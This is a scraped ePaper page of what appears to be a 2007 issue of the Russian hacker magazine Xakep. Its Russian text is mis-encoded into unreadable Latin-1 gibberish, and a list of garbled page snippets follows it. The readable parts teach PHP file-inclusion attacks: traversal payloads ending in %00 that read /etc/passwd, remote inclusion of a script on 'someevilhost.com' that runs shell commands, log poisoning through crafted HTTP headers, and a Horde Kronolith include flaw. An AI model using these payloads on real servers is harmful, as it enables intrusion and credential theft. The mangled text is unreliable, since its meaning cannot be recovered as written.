Ã‘ÂÃ‘Â‚ÃÂ¾ÃÂ¼ - Xakep Online

More documents

Recommendations

Info

18 ÃËÎÁÀËÜÍÀß ÝÏÈÄÅÌÈß ÑÏÅÖ 02-07Êîãäà ïðîèñõîäèò âêëþ÷åíèå ôàéëà, êîä, ñîäåðæàùèéñÿâ ýòîì ôàéëå, íàñëåäóåò ïåðåìåííûå,ïðåäîïðåäåëåííûå äî ñòðîêè, íà êîòîðîé ïðîèñõîäèòâêëþ÷åíèå. Ëþáûå ïåðåìåííûå, äîñòóïíûåâ ýòîé ñòðîêå â âûçûâàþùåì ôàéëå, áóäóò äîñòóïíûâíóòðè âûçûâàåìîãî ôàéëà. Îòìåòèì, ÷òî âñåôóíêöèè è êëàññû, îïðåäåëåííûå âî âêëþ÷åííîìôàéëå, èìåþò ãëîáàëüíóþ îáëàñòü âèäèìîñòè.include_once()/require_once(). Include_once()âêëþ÷àåò è âûïîëíÿåò óêàçàííûé ôàéë âî âðåìÿâûïîëíåíèÿ ñêðèïòà. Äàííîå ïîâåäåíèå íàïîìèíàåòîïèñàííîå ðàíåå ïîâåäåíèå ôóíêöèè include(),ñ åäèíñòâåííûì îòëè÷èåì, çàêëþ÷àþùèìñÿ â ñëåäóþùåìóñëîâèè: åñëè êîä ôàéëà óæå áûë âêëþ÷åí,îí íå áóäåò âêëþ÷åí ñíîâà. Òàêèì îáðàçîì, êîäâêëþ÷àåìîãî ôàéëà âûïîëíèòñÿ ëèøü ðàç. Îòëè÷èårequire_once() îò include_once() àíàëîãè÷íî îòëè÷èþôóíêöèé include() è require(). Äàííûìè ôóíêöèÿìèñëåäóåò ïîëüçîâàòüñÿ, ÷òîáû èçáåæàòü ïðîáëåì,ñâÿçàííûõ ñ ïåðåîïðåäåëåíèåì ôóíêöèé è ïåðåíàçíà÷åíèåìçíà÷åíèé ïåðåìåííûõ.register_globals. Êàæäûé ïîëüçîâàòåëü, èíòåðåñóþùèéñÿýêñïëîéòàìè è ïîñåùàþùèé áàãòðàê,õîòÿ áû ðàç âèäåë ôðàçó: «Ýêñïëóàòèðîâàíèå óÿçâèìîñòèòðåáóåò âêëþ÷åíèÿ îïöèè register_globalsâ êîíôèãóðàöèîííîì ôàéëå PHP». Äàâàé ðàçáåðåìñÿ,÷òî ýòî çà îïöèÿ è ñ ÷åì åå åäÿò.Ðàññìîòðèìïðèìåð, ñîñòîÿùèé èç òðåõ ôàéëîâ:ôàéë sample1.php:Ïðîñìîòð èñõîäíîãî êîäà ñòðàíèöûêàê PHP-êîä. Äåéñòâèÿ ôóíêöèé include() è require()èäåíòè÷íû çà èñêëþ÷åíèåì òîãî, êàê îíè îáðàáàòûâàþòîøèáêè. Â ñëó÷àå íåóäà÷è include() âîçâðàùàåòïðåäóïðåæäåíèå (Warning), â òî âðåìÿ êàê ðåçóëüòàòîìrequire() â ýòîì ñëó÷àå áóäåò âîçâðàùåíèåôàòàëüíîé îøèáêè (Fatal Error). Òàêèì îáðàçîì,ïðè íåîáõîäèìîñòè ïðåðâàòü îáðàáîòêó ñòðàíèöûâ ñëó÷àå íåâîçìîæíîñòè âêëþ÷èòü èñêîìûé ôàéë,íóæíî ïîëüçîâàòüñÿ ôóíêöèåé require(). Ïðè èñïîëüçîâàíèèinclude() â ñëó÷àå îøèáêè ñöåíàðèé ïðîäîëæèòâûïîëíåíèå.Êîíôèãóðàöèîííàÿ äèðåêòèâà include_pathóêàçûâàåò ñïèñîê äèðåêòîðèé, â êîòîðûõ ôóíêöèèrequire() è include() èùóò ôàéëû. Ôîðìàò ñîîòâåòñòâóåòôîðìàòó ïåðåìåííîé îêðóæåíèÿPATH èñïîëüçóåìîé ñèñòåìû: ñïèñîê äèðåêòîðèé,ðàçäåëåííûõ äâîåòî÷èåì â Unix èëè òî÷êîéñ çàïÿòîé â Windows.Ñïåðâà ñèñòåìà èùåò ôàéëû â ïóòè include_path îòíîñèòåëüíîòåêóùåé äèðåêòîðèè, à çàòåì — â include_pathîòíîñèòåëüíî äèðåêòîðèè òåêóùåãî ñêðèïòà. Íàïðèìåð,åñëè include_path èìååò çíà÷åíèå «.», òåêóùàÿðàáî÷àÿ äèðåêòîðèÿ /www/, ðàáî÷èé ñöåíàðèé include/a.php,è â ýòîì ñöåíàðèè ìû îñóùåñòâëÿåì âêëþ-÷åíèå include «sample2.php», òî ñèñòåìà áóäåò èñêàòüsample2.php ñíà÷àëà â /www/, à çàòåì â /www/include/.Åñëè èìÿ ôàéëà íà÷èíàåòñÿ ñ ./ èëè ../, îí èùåòñÿ òîëüêîâ include_path îòíîñèòåëüíî òåêóùåé äèðåêòîðèè.ôàéë sample2.php:ôàéë sample3.php:Êàê âèäíî, ôàéë sample1.php âêëþ÷àåò sample2.php,à ôàéë sample2.php âêëþ÷àåò sample3.php.Ôàéë sample1.php óñòàíàâëèâàåò ïåðåìåííóþ$var1 äî âûçîâà sample2.php. Çàòåì â sample2.phpâêëþ÷àåòñÿ ôàéë âíå çàâèñèìîñòè îò òîãî, êàêîåÏÎÂÅÄÅÍÈÅ ÌÍÎÃÈÕ ÔÓÍÊÖÈÉ ÇÀÂÈÑÈÒ ÎÒ ÍÀÑÒÐÎÅÊ Â PHP.INI,ÏÎÝÒÎÌÓ ÒÙÀÒÅËÜÍÎ ÏÐÎÂÅÐßÉ ÝÒÎÒ ÔÀÉË ÏÅÐÅÄÈÑÏÎËÜÇÎÂÀÍÈÅÌ ÊÀÊÎÉ-ËÈÁÎ ÍÎÂÎÉ ÔÓÍÊÖÈÈ
19çíà÷åíèå èìååò $var1. Ïðîáëåìà äàííîãî êîäàâ ñëåäóþùåì: îí íå ó÷èòûâàåò, ÷òî êòî-òî ìîæåò ïîëó÷èòüäîñòóï íàïðÿìóþ ê sample2.php.Ïðîáëåìà ïðîÿâèò ñåáÿ, åñëè â êîíôèãóðàöèîííîìôàéëå PHP âêëþ÷åíà äèðåêòèâà register_globals.Âêëþ÷åíèå äàííîé äèðåêòèâû îçíà÷àåò, ÷òî ëþáàÿïåðåìåííàÿ ìîæåò áûòü óñòàíîâëåíà ÷åðåç çàïðîñïîëüçîâàòåëÿ. Ïåðåìåííàÿ $var1 óñòàíîâëåíàäî èñïîëüçîâàíèÿ â sample2.php, íî åñëè êòî-òî ïîëó÷èòäîñòóï â sample2.php ïåðâûì (äî sample1.php),è ñâîéñòâî register_globals áóäåò âêëþ÷åíî, òî çíà÷åíèåïåðåìåííîé $var1 ìîæåò áûòü èçìåíåíî ÷åðåçïîëüçîâàòåëüñêèé çàïðîñ.Ê ïðèìåðó, åñëè web-ïðèëîæåíèå äîñòóïíî ïîññûëêå www.vul_site.com/sample1.php, âñå, ÷òî íàì íóæíîñäåëàòü, — ýòî ïåðåéòè ïî àäðåñó www.vul_site.com/sample2.phpè, â çàâèñèìîñòè îò íàñòðîåê â php.ini, ìû, ñêîðååâñåãî, ïîëó÷èì ñòðàíèöó ñ îøèáêîé, êîòîðàÿ ïîäñêàæåòíàì, ÷òî sample2.php îæèäàåò íåêîòîðîå çíà÷åíèåäëÿ ïåðåìåííîé $var1. À ïîñêîëüêó ñâîéñòâî register_globalsâêëþ÷åíî, ïîëüçîâàòåëü ñàìîñòîÿòåëüíîìîæåò èíèöèàëèçèðîâàòü çíà÷åíèå äàííîé ïåðåìåííîé÷åðåç ñîîòâåòñòâóþùèé çàïðîñ: www.vul_site.com/-sample2.php?var1=any_file_name. Ñöåíàðèé ïîïûòàåòñÿïîäêëþ÷èòü ñîîòâåòñòâóþùèé èñêîìûé ôàéë, â ñëó-÷àå íåóäà÷è áóäåò âûäàíî ñîîáùåíèå îá îøèáêå.magic_quotes_gpc. Èòàê, ïîïûòàåìñÿ èçâëå÷üïîëüçó è ïîäêëþ÷èòü âìåñòî âàëèäíîãî ñöåíàðèÿ,íàïðèìåð, ôàéë, ñîäåðæàùèé õýøè ïàðîëåé ïîëüçîâàòåëåé/etc/passwd:www.vul_site.com/sample2.php?var1=../../../../../../../etc/passwd.Íî â ðåçóëüòàòå ìû ïîëó÷èì îøèáêó. Ïîäêëþ÷åíèåôàéëà íå ïðîèçîéäåò ïîòîìó, ÷òî ñöåíàðèé sample2.phpäîïèñûâàåò â êîíöå ëþáîãî ôàéëà ðàñøèðåíèå«.php» è ïûòàåòñÿ ïîëó÷èòü äîñòóï ê ../../../../../../-../etc/passwd.ðhp, êîòîðîãî, åñòåñòâåííî, íå ñóùåñòâóåò.Ñîîòâåòñòâåííî, åñëè â ñâîèõ «ó÷åáíûõ» öåëÿõìû õîòèì èñïîëüçîâàòü ÷òî-ëèáî ïîìèìî PHP-ñöåíàðèåâ,íóæíî èçáåæàòü äîáàâëåíèÿ îêîí÷àíèÿ «.php».Ðåøåíèå ïðîáëåìû ëåæèò â ôàéëå php.ini è íàçûâàåòñÿmagic_quotes_gpc. Magic_quotes_gpc — ýòî ñâîéñòâî,äåéñòâèÿ êîòîðîãî ýêâèâàëåíòíû äåéñòâèþôóíêöèè addslashes(). Äàííàÿ ôóíêöèÿ âîçâðàùàåòñðîêó, â êîòîðîé ïåðåä êàæäûì ñïåöñèìâîëîì (',",\ èNUL (áàéò NULL)) äîáàâëåí îáðàòíûé ñëåø (\). ÀááðåâèàòóðàGPC ðàñøèôðîâûâàåòñÿ êàê Get, Post, Cookie.Ýòî çíà÷èò, ÷òî ïî ñóòè magic_quotes_gpc ïðèìåíÿåòôóíêöèþ addslashes() êî âñåì âàøèì GET-,POST-, è COOKIE-äàííûì.Òàêèì îáðàçîì, åñëè ñâîéñòâî magic_quotes_gpcóñòàíîâëåíî â «off», çíà÷èò, ñóùåñòâóåò âîçìîæíîñòüâêëþ÷åíèÿ ëîêàëüíûõ ôàéëîâ ñ íóëåâûìáàéòîì â êîíöå èìåíè ôàéëà. Â PHP íóëåâîé ñèìâîëîáîçíà÷àåòñÿ êàê «\n», ÷òî ýêâèâàëåíòíî øåñòíàäöàòåðè÷íîìóçíà÷åíèþ «%00».Òàêèì îáðàçîì, ñëåäóþùèé çàïðîñ ñïîñîáåíïðåäîñòàâèòü èíòåðåñóþùèé íàñ ôàéë /etc/passwd:www.vul_site.com/sample2.php?var1=../../../../../../../etc/passwd%00Îòìåòèì, ÷òî ñèìâîëû «../» aka «dot dot slash» ÿâëÿþòñÿñïåöèôèêàòîðàìè îáõîäà äèðåêòîðèé (DirectoryTraversal Specifiers) è ñëóæàò äëÿ äîñòóïà ê ôàéëàìâíå òåêóùåé äèðåêòîðèè. Òàê æå ìîæíî âêëþ÷àòüóäàëåííûå ôàéëû, ñîäåðæàùèå çëîíàìåðåííûé êîä.Ïðåäïîëîæèì, ìû õîòèì âêëþ÷èòü óäàëåííûéôàéë evilscript.php ñëåäóþùåãî ñîäåðæàíèÿ:Êîìàíäà passthru() â PHP âûïîëíÿåò óêàçàííûå êîìàíäûíà ñåðâåðå. Ïåðåìåííàÿ $_GET æäåò óêàçàíèÿêîìàíäû è åå ïàðàìåòðîâ â çàïðîñå ïîëüçîâàòåëÿ.Â ðåçóëüòàòå ìû ìîæåì ïîëó÷èòü ôàéë ñ ïàðîëÿìèïîëüçîâàòåëåé óæå äðóãèì ñïîñîáîì, èñïîëüçóÿóäàëåííûé ñöåíàðèé evilscript.php è ÿâíîóêàçàâ íóæíóþ êîìàíäó â ñòðîêå çàïðîñà:http://localhost/index.php?page=http://someevilhost.com/evilscript.php?cmd=cat /etc/passwdèíæåêòèðîâàíèå ñöåíàðèÿ â ëîã-ôàéëû. Èíîãäàâîçíèêàåò ñèòóàöèÿ, êîãäà àäìèíèñòðàòîð ñàéòàñ ïîìîùüþ íåêîòîðûõ íàñòðîåê çàïðåùàåò ïîäêëþ-÷àòü óäàëåííûå ôàéëû. Íàïðèìåð, óñòàíîâêà îïöèèallow_url_fopen â çíà÷åíèå «off» çàïðåòèò âêëþ÷àòüñöåíàðèè ñ óäàëåííûõ ðåñóðñîâ. Òåì íå ìåíåå, äàæåâ ýòîé ñèòóàöèè îñòàåòñÿ âîçìîæíîñòü èíæåêòèðîâàòüñîáñòâåííûé PHP-êîä â æóðíàë ðåãèñòðàöèèñîáûòèé. Äëÿ ýòîãî íóæíî ñîñòàâèòü HTTP-GETçàïðîñ,ñîäåðæàùèé â ñåáå PHP-êîä, êîòîðûé íåîáõîäèìîâûïîëíèòü.$CODE ='';$content.="GET /path/".$CODE."HTTP/1.1/n";$content.="User-Agent: ".$CODE."/n";$content.="Host: ".$host."/n";$content.="Connection: close/n/n";Â ðåçóëüòàòå PHP-êîä áóäåò ïåðåäàí ñåðâåðó ÷åðåçïðåäñòàâëåííûé çàïðîñ. Ñåðâåð çàðåãèñòðèðóåò ïîïûòêóäîñòóïà â ñâîèõ ëîãàõ. Ýòî çíà÷èò, ÷òî â ôàéëàõðåãèñòðàöèè ñîáûòèé îñòàíåòñÿ è íàø PHP-êîä.Ïîñëå ýòîãî îñòàåòñÿ òîëüêî ïîëó÷èòü äîñòóï ê æóðíàëàì÷åðåç ëîêàëüíîå âêëþ÷åíèå ôàéëîâ. Âûïîëíåíèåëîã-ôàéëà ïðè âêëþ÷åíèè íè÷åì íå îòëè÷àåòñÿîò âûïîëíåíèÿ PHP-ñöåíàðèÿ: ëèøíèé ìóñîð áóäåòîòáðîøåí, à ôóíêöèè PHP — âûïîëíåíû. Ïåðåäàííûåêîìàíäû áóäóò âûïîëíåíû áåç íåîáõîäèìîñòèâêëþ÷åíèÿ óäàëåííîãî ôàéëà. Äëÿ âûïîëíåíèÿ äàííîãîýêñïëîéòà íåîáõîäèìî âêëþ÷åíèå îïöèè register_globalsè âûêëþ÷åíèå îïöèè magic_quotes_gpc.óÿçâèìîñòü â Horde Kronolith. Íà ìîìåíò íàïèñàíèÿäàííîé ñòàòüè îäíîé èç ïîñëåäíèõ íà iDefenceLabs áûëà íîâîñòü îá óÿçâèìîñòè â web-êàëåíäàðåHorde Kronolith, ïîçâîëÿþùåé âêëþ÷èòü è âûïîëíèòüïðîèçâîëüíûé ëîêàëüíûé ôàéë. Â îïóáëèêîâàííîéíîâîñòè ðàññìàòðèâàåòñÿ ïðîáëåìíûé ó÷àñòîê êîäà,íî íå ïðèâîäèòñÿ ïðèìåð ýêñïëóàòèðîâàíèÿ óÿçâèìîñòè.Äàâàé ïðîàíàëèçèðóåì, íàñêîëüêî ëåãêî çëîóìûøëåííèêìîæåò ñîñòàâèòü ýêñïëîéò, èìåÿ ïåðåäãëàçàìè ïðîáëåìíûé ó÷àñòîê êîäà.Íà ñàéòå ïðèâîäèëñÿ ñëåäóþùèé ó÷àñòîêïðîáëåìíîãî êîäà ñöåíàðèÿ 'lib/FBView.php':177 function &factory($view)178 {179 $driver = basename($view);180 require_once dirname(__FILE__) .'/FBView/' . $view . '.php';Êàê âèäíî, óÿçâèìîñòü îáíàðóæåíà â ôóíêöèèKronolith_FreeBusy_View::factory, êîòîðàÿ âêëþ÷àåòëîêàëüíûå ôàéëû, ïåðåäàííûå ÷åðåç 'view' HTTP-GET-ïàðàìåòð çàïðîñà. Â ñòðîêå 179 ñ ïîìîùüþôóíêöèè basename(string path [, string suffix]) îñóùåñòâëåíàïðîâåðêà ââîäèìûõ äàííûõ. Äàííàÿ ôóíêöèÿâîçâðàùàåò èìÿ ôàéëà, ÷åé ïóòü ïåðåäàåòñÿ â êà÷åñòâåïàðàìåòðà. Åñëè èìÿ ôàéëà îêàí÷èâàåòñÿ íàsuffix, îí òàêæå áóäåò îòáðîøåí. Òàêèì îáðàçîì, èñïîëüçóÿôóíêöèþ basename(), ðàçðàáîò÷èêè ïîçàáîòèëèñüîá îáðåçàíèè âîçìîæíûõ çëîíàìåðåííûõñèìâîëîâ, ñîäåðæàùèõñÿ â ïåðåìåííîé $view. Îäíà-äîáðûé èíñïåêòîðÂ ÑÒÀÒÜÅ ÌÛ ÐÀÑÑÌÎÒÐÅËÈÂÎÇÌÎÆÍÎÑÒÜ ÌÎÄÈÔÈÊÀÖÈÈÈÑÕÎÄÍÛÕ ÒÅÊÑÒÎÂ ÑÒÐÀÍÈÖÛÏÓÒÅÌ ÑÎÕÐÀÍÅÍÈß ÒÅÊÑÒÎÂ È ÈÕÈÇÌÅÍÅÍÈß Â ÎÔÔËÀÉÍÅ.ÏÐÈ ÈÑÏÎËÜÇÎÂÀÍÈÈ ÏÐÎÄÂÈÍÓÒÛÕWEB-ÁÐÀÓÇÅÐÎÂ, ÒÀÊÈÕ ÊÀÊ FIREFOX,ÑÓÙÅÑÒÂÓÅÒ ÁÎËÅÅ ÏÐÎÑÒÎÉ ÌÅÒÎÄÐÅØÅÍÈß ÄÀÍÍÎÉ ÏÐÎÁËÅÌÛ. ÈÌß ÅÌÓDOM INSPECTOR (TOOLS!WEB DEVELOP-MENT!DOM INSPECTOR).ÏÐÈ ÈÑÏÎËÜÇÎÂÀÍÈÈ DOM-ÈÍÑÏÅÊÒÎÐÀ, ÂÑÅ, ×ÒÎ ÍÀÌ ÍÓÆÍÎ, —ÝÒÎ ÎÒÊÐÛÒÜ ÏÎÄÎÏÛÒÍÓÞ ÑÒÐÀÍÈÖÓ.Â ÐÅÇÓËÜÒÀÒÅ ÂÍÈÇÓ ÎÊÍÀ ÁÐÀÓÇÅÐÀDOM-ÈÍÑÏÅÊÒÎÐÀ ÐÀÑÊÐÎÅÒÑßÑÒÐÀÍÈÖÀ.ÑËÅÂÀ ÂÂÅÐÕÓ ÎÊÍÀ DOM-ÈÍÑÏÅÊÒÎÐÀÏÎßÂÈÒÑß ÑÒÐÓÊÒÓÐÀ ÈÑÑËÅÄÓÅÌÎÉÑÒÐÀÍÈÖÛ. ÍÀÆÈÌÀß ÍÀ ÊÍÎÏÊÓÑÎ ÑÒÐÅËÊÎÉ-ÓÊÀÇÀÒÅËÅÌ ÑËÅÂÀÍÀ ÏÀÍÅËÈ ÈÍÑÒÐÓÌÅÍÒÎÂ DOM-ÈÍÑÏÅÊÒÎÐÀ È ÊËÈÊÀß ÏÎÈÍÒÅÐÅÑÓÞÙÅÌÓ ÍÀÑ ÝËÅÌÅÍÒÓÈÑÑËÅÄÓÅÌÎÉ ÑÒÐÀÍÈÖÛ, ÌÎÆÍÎËÅÃÊÎ ÏÅÐÅÄÂÈÃÀÒÜÑß È ÈÇÌÅÍßÒÜÍÓÆÍÛÅ ÒÅÃÈ È ÈÕ ÀÒÐÈÁÓÒÛ.
Page 1: 02(75)ÔÅÂÐÀËÜ 2007ÅÆÅÌÅ
Page 4 and 5: ÅÆÅÌÅÑß×ÍÛÉÒÅÌÀÒÈ
Page 6 and 7: timeline2000{çàðîæäåíèå}
Page 8: 06 /37 ÃËÎÁÀËÜÍÀß ÝÏÈ
Page 11 and 12: 9æåò âûïîëíÿòü íåñê
Page 13 and 14: 11ñåðâåðå åñòü òàáë
Page 15 and 16: 13Ïîïðîáóåì âñàäèòü
Page 17 and 18: ÝÍÖÈÊËÎÏÅÄÈßGamePostÎ
Page 19: 17ÝÊÑÏËÎÉÒÀ ÏÎÄ ÊÀÊ
Page 23 and 24: VERSUS4,3 KENTSFIELD SLINVIDIA Ge
Page 25 and 26: 23ïðèòîíûèíòåðíåòà
Page 27 and 28: 255 /5BugTraq.Ruwww.bugtraq.ru3,5 /
Page 29 and 30: 27Òàáëèöà 1Òàáëèöà 2
Page 31 and 32: 29abstract class Decorator extends
Page 33 and 34: 31PHPÑîçäàâ òàêîé ôàé
Page 36 and 37: 34 ÃËÎÁÀËÜÍÀß ÝÏÈÄÅ
Page 38 and 39: 36 ÃËÎÁÀËÜÍÀß ÝÏÈÄÅ
Page 40: 38 /67 ÎØÈÁÊÈÌÎËÎÄÎÑÒ
Page 43 and 44: 41ÁÛÒÜ ÎÁÐÀÙÅÍÈß Ê Ô
Page 45 and 46: 1 ÌÅÑÒÎ 2 ÌÅÑÒÎ 3 ÌÅÑ
Page 47 and 48: 45ïðîèçâîäèì ïðîâåð
Page 49 and 50: 47CyD NET Utilswww.cydsoft.comshare
Page 52 and 53: 50 ÎØÈÁÊÈ ÌÎËÎÄÎÑÒÈ
Page 54 and 55: 52 ÎØÈÁÊÈ ÌÎËÎÄÎÑÒÈ
Page 56: 54 ÎØÈÁÊÈ ÌÎËÎÄÎÑÒÈ
Page 59 and 60: 57Q: Êàê îò SQL injection è X
Page 61 and 62: æå ëþäÿì, ïðîñòî îð
Page 63 and 64: http://www.gameland.ru/ Dark Fall:
Page 65 and 66: 63Íó è, íàêîíåö, Perl î
Page 67 and 68: 65Íåñêîëüêî ñëîâ î Ne
Page 69 and 70: 67http://dm9.ru/cgi-bin/perltest/sc
Page 71 and 72:
69î ïîäëîãå. Îïÿòü æ
Page 73 and 74:
71ñåíêó ïîä íîìåðîì
Page 75 and 76:
73ÊÀÊÈÅ ÑÏÎÑÎÁÛ ÁÎÐ
Page 77:
{IT}Ñ ÌÀÐÒÀÂÑÅ ÁÓÄÅÒ
Page 82 and 83:
80 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07È
Page 84 and 85:
82 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07Ï
Page 86 and 87:
84 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07è
Page 88 and 89:
86 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07ì
Page 90 and 91:
88 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07ã
Page 92:
90 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07Ò
Page 95 and 96:
93DEEPNESS IN THE SKYby MFXAETHERby
Page 97 and 98:
îáùåíèÿ äèñêóññèè.
Page 99 and 100:
Vista Manager 1.0.3winxp-manager.co
Page 101 and 102:
MSI MEGABOOKS430($1199) 6 áàëë
Page 103 and 104:
MSI MEGABOOKS430($1199) 6 áàëë
Page 105 and 106:
2Àíäðåé Êàðàìíîââå
Page 107 and 108:
105 |ìÿ îíëàéí, æäåò â
Page 109 and 110:
Ðûêîâ áûë óâåðåí: î
Page 111 and 112:
ìîæíîãî çàêëàäûâàí
Page 113 and 114:
Õâàëþ. Íàì áû ñ âàìè
Page 115:
Думаешь, что посмот
show all

Ã‘ÂÃ‘Â‚ÃÂ¾ÃÂ¼ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

Ã‘ÂÃ‘Â‚ÃÂ¾ÃÂ¼ - Xakep Online